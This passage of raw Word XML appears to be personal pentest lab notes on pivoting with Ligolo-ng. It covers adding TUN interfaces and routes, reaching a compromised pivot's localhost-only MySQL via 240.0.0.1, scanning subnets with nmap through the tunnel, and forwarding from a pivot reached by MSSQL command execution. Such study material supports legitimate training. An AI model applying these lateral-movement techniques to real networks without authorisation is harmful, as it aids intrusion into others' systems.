          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000720">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure Ligolo is "UP" and not "DOWN"</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000723">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure Ligolo is "UP" and not "DOWN"</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6sxfx249gnfl" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000727">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_18jswm9p09m5" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to set up VPN-like Experience</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000728">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The only flaw of this is that we can't access the pivot/target machine as localhost. If you need that (as we needed in the Secura Challenge Lab), then look at the local port forward section, which does exactly that. </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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add &lt;subnet&gt;/24 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ add a new route to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → target subnet you want to reach through the tunnel (example: 10.10.0.0/24).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1273"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dev ligolo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → use the ligolo TUN interface to send traffic to that subnet.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000731">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000732">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000735">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link show</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000738">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000739">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_noiv5gbjw92h" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to local port forward (access target machine as local host)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the guide I used (chatGPT didn't work)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId172">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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t xml:space="preserve">The target machine only allowed mysql access if it was accessed locally via 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, you have to use the 240.0.0.1 subnet. </w:t>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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think this only works if you use a different pivot or if you have two agent.exe running on the same pivot. Venkat confirmed it works with two different pivots as long as you create a new interface. This is because one agent.exe can only handle one session at a time.</w:t>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t xml:space="preserve">Make a new interface and start it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000744">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000745">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo2 up</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a route to this interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000748">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add 240.0.0.1/32 dev ligolo2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000749">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on Kali terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This says "If I ever try to send packets to 240.0.0.1, don’t send it to the real network — instead send it into the ligolo interface."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo’s proxy then intercepts that traffic and routes it across the tunnel to the agent on the victim, where it is run locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you've already run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the ligolo console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="582"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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Then, if you want to forward stuff from your Kali to be run by the target machine, just specify IP 240.0.0.1</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">240.0.0.1 will point to whatever machine Ligolo-ng has an active tunnel on.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h 240.0.0.1 -u root -p --skip-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000757">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command was sent to target machine, which ran the command locally, allowing access to mysql. It was like if I ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000758">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in the guide above, they use it to access a website that is only allowed to be accessed locally.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, if you need more complicated port forwarding, where you need to access the port of another machine (not the pivot) and you need to use the pivot to access it, then use the VPN-like experience section. The only flaw of that section is that you can't access the pivot machine's 127.0.0.1, so this local port forward section solves that</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5u4sy8r1u3up" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP in Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000075D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -Pn -v &lt;subnet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000075E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV --unprivileged -Pn</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rh9et81mionu" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forward from pivot to Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000761">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-B Challenge lab on .147 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine, we had command execution via mssql, but we couldn't access our kali from the .147 machine. So, we had to set up a listener on the pivot, which had access to both 192 and 10 subnet, and then we can forward traffic from pivot to kali.</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t xml:space="preserve">On Ligolo, can we add listener to pivot as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
